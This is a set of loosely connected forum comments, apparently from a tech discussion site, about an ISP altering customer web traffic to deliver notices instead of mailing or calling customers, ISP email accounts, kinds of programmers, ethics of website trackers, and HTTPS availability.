Paper mail costs maybe 50 cents for a regular letter. If "may not be read" is a concern, send it certified. That costs all of $4. Too expensive? This is a company that charges $10/month to rent a $50 cable modem. They get none of my sympathy when it comes to cost. If negative sympathy were physically possible, I'd give them that.
This problem you describe is solved. Businesses all over the place manage to figure out how to communicate with their customers, but you want me to believe that Comcast is in some impossible situation where their only choice is to corrupt the data they're transmitting?
If you need to get in touch with your customers, then you can:
1. E-mail.
2. Call.
3. Send a letter.
4. Send a certified letter.
And if none of that works, disconnect the service since there's obviously nobody living there anymore. If the $4 for a certified letter breaks the bank, then add a clause to your service contract that says the customer has to pay it back if it ever gets to that point.
Not every problem needs to be solved with computers over the internet.
Email doesn't work because ISPs don't always have the customer's address
What ISPs don't provide an email account (usually something like username@isp-domain) with their service? I thought that was the standard way to do things, and it's what mine does to send me alerts about service outages and maintenance windows.
Fundamentally there are two types of programmers, those who are interested in programming in all its forms and actively seek out communities with similar interests (you see this in framework communities and language communities particularly) and those who don't, the second set may be good programmers or not (I'd suspect having met some of them that the average second set programmer is not as capable as the first set but that's anecdotal).
They also tend to be the ones who use whatever tool they are using for a long time and argue "good enough is good enough" as a justification for not learning new things.
I know this is a horribly broad generalization but I have seen it repeat constantly over time, you also tend to find them working for large organisations or on legacy stuff that wasn't legacy when they wrote it.
Again, horribly broad generalization and some enterprise programmers are amazing.
I wonder in terms of ethics. Why don't they tell the bosses it is unethical? Like bankers, software engineers need some ethics treatment. I look at you who add multiple trackers to websites.
Only on websites which actually have https version. Many do, but many don't. It's usually ~100% on websites I use daily and goes well below 50% when I try to google for anything uncommon.